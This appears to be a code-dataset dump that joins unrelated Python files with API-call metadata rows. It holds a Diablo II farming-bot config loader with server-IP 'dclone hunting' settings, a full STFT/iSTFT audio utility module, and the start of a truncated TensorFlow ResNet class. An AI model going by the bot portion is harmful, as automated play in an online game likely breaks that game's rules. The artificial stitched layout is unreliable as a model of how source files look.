"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| [((173, 20, 173, 47), 'os.listdir', 'os.listdir', ({(173, 31, 173, 46): 'f"""assets/items"""'}, {}), "(f'assets/items')", False, 'import os\n'), ((23, 23, 23, 50), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((25, 28, 25, 55), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((27, 30, 27, 57), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((29, 28, 29, 55), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((31, 23, 31, 50), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((32, 51, 32, 86), 'os.path.exists', 'os.path.exists', ({(32, 66, 32, 85): '"""config/custom.ini"""'}, {}), "('config/custom.ini')", False, 'import os\n'), ((169, 15, 169, 56), 'os.path.exists', 'os.path.exists', ({(169, 30, 169, 55): 'f"""./assets/items/{k}.png"""'}, {}), "(f'./assets/items/{k}.png')", False, 'import os\n'), ((32, 11, 32, 36), 'os.environ.get', 'os.environ.get', ({(32, 26, 32, 35): '"""RUN_ENV"""'}, {}), "('RUN_ENV')", False, 'import os\n'), ((135, 39, 135, 82), 'os.path.exists', 'os.path.exists', ({(135, 54, 135, 81): 'f"""./assets/items/{key}.png"""'}, {}), "(f'./assets/items/{key}.png')", False, 'import os\n')] |
haoxiangsnr/aps | aps/transform/utils.py | 38f77139b54553b0cb04b26a833bebbbf3177c5e | # Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| [((79, 8, 79, 24), 'torch.fft', 'th.fft', ({(79, 15, 79, 20): 'I / S', (79, 22, 79, 23): '1'}, {}), '(I / S, 1)', True, 'import torch as th\n'), ((88, 8, 88, 46), 'torch.reshape', 'th.reshape', ({(88, 19, 88, 20): 'K', (88, 22, 88, 45): '(B * 2, 1, K.shape[-1])'}, {}), '(K, (B * 2, 1, K.shape[-1]))', True, 'import torch as th\n'), ((125, 10, 131, 54), 'librosa.filters.mel', 'filters.mel', (), '', True, 'import librosa.filters as filters\n'), ((133, 11, 133, 43), 'torch.tensor', 'th.tensor', (), '', True, 'import torch as th\n'), ((152, 10, 152, 34), 'math.gcd', 'math.gcd', ({(152, 19, 152, 25): 'src_sr', (152, 27, 152, 33): 'dst_sr'}, {}), '(src_sr, dst_sr)', False, 'import math\n'), ((167, 11, 167, 46), 'torch.tensor', 'th.tensor', (), '', True, 'import torch as th\n'), ((260, 17, 260, 44), 'torch.chunk', 'th.chunk', (), '', True, 'import torch as th\n'), ((326, 13, 326, 40), 'torch.cat', 'th.cat', (), '', True, 'import torch as th\n'), ((328, 8, 328, 72), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (), '', True, 'import torch.nn.functional as tf\n'), ((332, 10, 334, 38), 'torch.repeat_interleave', 'th.repeat_interleave', (), '', True, 'import torch as th\n'), ((338, 11, 338, 70), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (), '', True, 'import torch.nn.functional as tf\n'), ((71, 17, 71, 61), 'torch.nn.functional.pad', 'tf.pad', ({(71, 24, 71, 30): 'window', (71, 32, 71, 60): '(lpad, B - frame_len - lpad)'}, {}), '(window, (lpad, B - frame_len - lpad))', True, 'import torch.nn.functional as tf\n'), ((86, 8, 86, 29), 'torch.transpose', 'th.transpose', ({(86, 21, 86, 22): 'K', (86, 24, 86, 25): '(0)', (86, 27, 86, 28): '(2)'}, {}), '(K, 0, 2)', True, 'import torch as th\n'), ((195, 14, 195, 70), 'torch.arange', 'th.arange', (), '', True, 'import torch as th\n'), ((196, 14, 196, 45), 'torch.clamp', 'th.clamp', (), '', True, 'import torch as th\n'), ((200, 17, 200, 32), 'torch.cat', 'th.cat', ({(200, 24, 200, 27): 'ctx', (200, 29, 200, 31): '-1'}, {}), '(ctx, -1)', True, 'import torch as th\n'), ((203, 17, 203, 34), 'torch.stack', 'th.stack', ({(203, 26, 203, 29): 'ctx', (203, 31, 203, 33): '-1'}, {}), '(ctx, -1)', True, 'import torch as th\n'), ((244, 14, 244, 53), 'torch.nn.functional.pad', 'tf.pad', (), '', True, 'import torch.nn.functional as tf\n'), ((248, 17, 250, 37), 'torch.nn.functional.unfold', 'tf.unfold', (), '', True, 'import torch.nn.functional as tf\n'), ((253, 17, 253, 59), 'torch.matmul', 'th.matmul', ({(253, 27, 253, 50): 'kernel[:, (0)][None, ...]', (253, 52, 253, 58): 'frames'}, {}), '(kernel[:, (0)][None, ...], frames)', True, 'import torch as th\n'), ((255, 17, 255, 68), 'torch.nn.functional.conv1d', 'tf.conv1d', (), '', True, 'import torch.nn.functional as tf\n'), ((316, 15, 316, 36), 'torch.unsqueeze', 'th.unsqueeze', ({(316, 28, 316, 32): 'real', (316, 34, 316, 35): '0'}, {}), '(real, 0)', True, 'import torch as th\n'), ((317, 15, 317, 36), 'torch.unsqueeze', 'th.unsqueeze', ({(317, 28, 317, 32): 'imag', (317, 34, 317, 35): '0'}, {}), '(imag, 0)', True, 'import torch as th\n'), ((323, 15, 323, 50), 'torch.cat', 'th.cat', ({(323, 22, 323, 46): '[real, real[:, (reverse)]]', (323, 48, 323, 49): '1'}, {}), '([real, real[:, (reverse)]], 1)', True, 'import torch as th\n'), ((324, 15, 324, 51), 'torch.cat', 'th.cat', ({(324, 22, 324, 47): '[imag, -imag[:, (reverse)]]', (324, 49, 324, 50): '1'}, {}), '([imag, -imag[:, (reverse)]], 1)', True, 'import torch as th\n'), ((336, 8, 336, 50), 'torch.eye', 'th.eye', (), '', True, 'import torch as th\n'), ((473, 17, 473, 53), 'torch.nn.Parameter', 'nn.Parameter', (), '', True, 'import torch.nn as nn\n'), ((474, 17, 474, 53), 'torch.nn.Parameter', 'nn.Parameter', (), '', True, 'import torch.nn as nn\n'), ((492, 11, 492, 44), 'torch.sum', 'th.sum', ({(492, 18, 492, 43): '(wav_len <= self.frame_len)'}, {}), '(wav_len <= self.frame_len)', True, 'import torch as th\n'), ((25, 15, 25, 59), 'torch.hann_window', 'th.hann_window', (), '', True, 'import torch as th\n'), ((77, 18, 77, 27), 'torch.eye', 'th.eye', ({(77, 25, 77, 26): 'B'}, {}), '(B)', True, 'import torch as th\n'), ((77, 29, 77, 43), 'torch.zeros', 'th.zeros', ({(77, 38, 77, 39): 'B', (77, 41, 77, 42): 'B'}, {}), '(B, B)', True, 'import torch as th\n'), ((197, 19, 197, 50), 'torch.index_select', 'th.index_select', ({(197, 35, 197, 40): 'feats', (197, 42, 197, 44): '(-2)', (197, 46, 197, 49): 'idx'}, {}), '(feats, -2, idx)', True, 'import torch as th\n'), ((269, 15, 269, 45), 'torch.stack', 'th.stack', (), '', True, 'import torch as th\n'), ((272, 14, 272, 34), 'torch.atan2', 'th.atan2', ({(272, 23, 272, 27): 'imag', (272, 29, 272, 33): 'real'}, {}), '(imag, real)', True, 'import torch as th\n'), ((67, 21, 67, 41), 'math.log2', 'math.log2', ({(67, 31, 67, 40): 'frame_len'}, {}), '(frame_len)', False, 'import math\n'), ((162, 13, 162, 39), 'numpy.arange', 'np.arange', ({(162, 23, 162, 38): '(2 * padding + 1)'}, {}), '(2 * padding + 1)', True, 'import numpy as np\n'), ((163, 30, 163, 53), 'numpy.abs', 'np.abs', ({(163, 37, 163, 52): '(times / padding)'}, {}), '(times / padding)', True, 'import numpy as np\n'), ((164, 46, 164, 79), 'numpy.cos', 'np.cos', ({(164, 53, 164, 78): '(times / padding * math.pi)'}, {}), '(times / padding * math.pi)', True, 'import numpy as np\n'), ((165, 13, 166, 32), 'numpy.sinc', 'np.sinc', ({(166, 8, 166, 31): '(times * zeros_per_block)'}, {}), '(times * zeros_per_block)', True, 'import numpy as np\n'), ((304, 30, 304, 50), 'torch.cos', 'th.cos', ({(304, 37, 304, 49): 'transform[1]'}, {}), '(transform[1])', True, 'import torch as th\n'), ((305, 30, 305, 50), 'torch.sin', 'th.sin', ({(305, 37, 305, 49): 'transform[1]'}, {}), '(transform[1])', True, 'import torch as th\n'), ((114, 12, 114, 32), 'math.log2', 'math.log2', ({(114, 22, 114, 31): 'frame_len'}, {}), '(frame_len)', False, 'import math\n'), ((160, 13, 160, 30), 'numpy.arange', 'np.arange', ({(160, 23, 160, 29): 'dst_sr'}, {}), '(dst_sr)', True, 'import numpy as np\n'), ((161, 13, 161, 30), 'numpy.arange', 'np.arange', ({(161, 23, 161, 29): 'src_sr'}, {}), '(src_sr)', True, 'import numpy as np\n')] |
xihuaiwen/chinese_bert | applications/tensorflow/cnns/models/resnet.py | 631afbc76c40b0ac033be2186e717885246f446c | # Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
